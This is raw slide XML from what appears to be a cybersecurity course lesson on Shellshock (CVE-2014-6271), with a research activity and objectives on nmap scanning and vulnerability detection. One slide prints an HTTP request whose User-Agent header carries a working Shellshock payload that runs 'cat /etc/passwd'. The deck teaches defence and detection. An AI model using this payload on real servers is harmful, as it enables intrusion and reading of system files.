            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attacker won’t actually use the functions defines. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rather, they inject code behind it. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2185" name="Google Shape;2185;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Creating a function means the server interprets the header as shellcode. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Since it doesn’t just read it as a string, it can execute arbitrary code on the target. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2186" name="Google Shape;2186;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2187" name="Google Shape;2187;p11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16</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2188" name="Google Shape;2188;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>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192"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2193" name="Google Shape;2193;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="71616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sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Therefore, attackers can execute arbitrary code on the server, including commands that open TCP connections back to your machine or that  show user passwords. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2194" name="Google Shape;2194;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1651925"/>
            <a:ext cx="6699600" cy="3491400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Host: example.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> User-Agent: () { :;}; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bin/bash -c “cat /etc/passwd”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Connection: keep-alive</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shellshock payloads are often executed with the following process:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/bin/bash -c `command`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> runs the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>`command`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> as a bash command. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/bin/bash -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>helps preserve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> more consistently. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2195" name="Google Shape;2195;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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600"/>
              <a:t>In the next activity, </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>we’ll study tools for detecting this vulnerability. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2196" name="Google Shape;2196;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2197" name="Google Shape;2197;p11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17</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2198" name="Google Shape;2198;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>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202"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2203" name="Google Shape;2203;p120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4234600"/>
            <a:ext cx="8970300" cy="634500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="1005825" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>20 minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2204" name="Google Shape;2204;p12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18</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2205" name="Google Shape;2205;p120"/>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206" name="Google Shape;2206;p120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="1042875"/>
            <a:ext cx="8595300" cy="2764200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="2560300" tIns="0" rIns="457200" bIns="457200" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Activity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Researching Shellshock</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will research </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>CVE-2014-6271</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, aka Shellshock.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Instructions sent via Slack.  </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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210"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2211" name="Google Shape;2211;p12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19</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2212" name="Google Shape;2212;p121"/>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213" name="Google Shape;2213;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502450" y="3571025"/>
            <a:ext cx="4139100" cy="892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990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Research Shellshock</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>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035"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2036" name="Google Shape;2036;p104"/>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Class Objectives</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2037" name="Google Shape;2037;p104"/>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By the end of class today, students will be able to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2038" name="Google Shape;2038;p10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2</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2039" name="Google Shape;2039;p104"/>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040" name="Google Shape;2040;p104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="914400" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Perform intense scans of target hosts using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Detect specific vulnerabilities, such as shellshock, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0" err="1">
